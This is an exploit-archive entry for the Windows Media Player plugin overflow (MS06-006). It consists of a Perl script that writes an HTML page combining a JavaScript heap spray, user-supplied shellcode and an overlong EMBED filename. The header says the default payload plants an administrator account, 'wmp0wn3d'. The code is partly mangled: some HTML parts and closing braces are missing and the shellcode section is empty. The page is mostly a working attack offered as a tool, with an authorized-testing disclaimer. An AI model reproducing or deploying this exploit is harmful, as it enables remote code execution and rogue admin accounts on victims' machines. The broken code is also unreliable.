Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)







# Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit
# By Matthew Murphy (
# It's come to my attention that the HTML versions of the exploit posted on
# several sites have become mangled. Notables include SecuriTeam and FrSIRT.
# Neither one, though, can beat SecurityFocus, whose links to the exploits
# for this issue are both 404s.
# I haven't updated the underlying exploit methodology -- it's still a shameless
# rip of Skylined's heap spray technique, but now the shellcode can be
# customized!
# The usage of this tool is as follows:
# [shellcode]
# The shellcode that comes with this has the same payload as the original.
# If it's successful against you, you'll have an administrator account named
# 'wmp0wn3d' with a password of 'password'. This, of course, assumes that
# you're running the vulnerable application as an administrator. There's a 
# lesson in that: run as a Limited User or at least tie down your browsers
# with Software Restriction.
# This will drop 'wmp-exploit.html' in the current directory. When the HTML
# document is opened locally or viewed remotely by a vulnerable web browser
# (Firefox on Windows), the exploit code will run and gain control of the
# browser.
# The standard disclaimer from the original exploit still applies, with some 
# changes:
# This exploit code is intended only as a demonstration tool for
# educational or testing purposes. It is not intended to be used for any
# unauthorized or illicit purpose. Any testing done with this tool OR ANY
# PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or 
# are explicitly authorized to test.
# By utilizing or possessing this code, you assume any and all
# responsibility for damage that results. The author will not be held
# responsible, under any circumstances, for damage that arises from your
# possession or use of this code.

$part1 =
"<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\">
<TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE>
var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\");
do {
spray += spray;
} while (spray.length < 0x1000000);
spray += unescape(\"";

$part2 =
<BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\">

$part3 =

if (@ARGV != 1) {
print STDERR "Usage: $0 [shellcode file]";

open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html for writing.";
print EXPLOIT $part1;

open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found.";
while (!eof(SHELLCODE)) {
$ch1 = getc(SHELLCODE);
if (eof(SHELLCODE)) {
print EXPLOIT "%u00";
print EXPLOIT sprintf("%%u00%.2x", ord($ch1));
} else {
$ch2 = getc(SHELLCODE);
print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1));

print EXPLOIT $part2;
print EXPLOIT "-"x2038;
print EXPLOIT "AAA\x05";
print EXPLOIT "AAA\x05";
print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv";
print EXPLOIT $part3;

----------------------------------------------- shellcode.hex -----------------------------------------


# [2006-02-22]